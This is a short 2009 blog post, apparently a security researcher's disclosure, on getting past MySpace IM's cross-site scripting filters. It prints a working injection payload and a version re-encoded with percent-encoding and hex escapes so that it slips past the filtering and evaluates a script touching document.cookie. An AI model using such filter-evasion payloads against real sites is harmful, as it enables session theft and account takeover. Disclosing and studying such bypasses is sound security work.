This site is soon to be deprecated by

Sunday, August 16, 2009

Bypassing Myspace IM XSS Filters -

The filtering Myspace IM uses is rather aggressive. Regardless of context, document. is changed to document· and eval() to ..). By using percent-encoding and JavaScript escaped hex sequences this can be circumvented.

The vulnerability (only works when logged in):"};alert(0);var x={"":"

The vulnerability re-encoded to bypass IM filters:};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22

No comments:

Post a Comment